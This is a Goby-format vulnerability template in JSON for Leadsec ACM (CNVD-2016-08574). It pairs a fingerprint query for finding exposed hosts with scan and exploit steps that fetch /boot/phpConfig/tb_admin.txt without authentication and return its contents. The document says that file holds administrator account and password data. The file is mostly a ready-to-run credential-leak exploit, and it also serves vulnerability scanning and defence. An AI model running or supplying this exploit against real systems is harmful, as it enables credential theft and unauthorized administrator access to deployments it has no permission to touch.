{ "Name": "Leadsec ACM information leakage CNVD-2016-08574", "Level": "3", "Tags": [ "infoleak" ], "GobyQuery": "product=\"Leadsec\"", "Description": "The account and password information is stored in the tb_admin.txt file, which can be accessed directly ", "Product": "Leadsec-Employee-Internet-Management", "Homepage": "http://www.leadsec.com.cn", "Author": "luckying1314@139.com", "Impact": "

Divulge the account and password to allow the attacker to log in to the system background and obtain administrator rights.  

", "Recommendation": "

Access to the file is not allowed

", "References": [ "https://www.cnvd.org.cn/flaw/show/CNVD-2016-08574" ], "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/boot/phpConfig/tb_admin.txt", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/boot/phpConfig/tb_admin.txt", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] } ], "PostTime": "2021-10-20 09:20:52", "GobyVersion": "1.8.301" }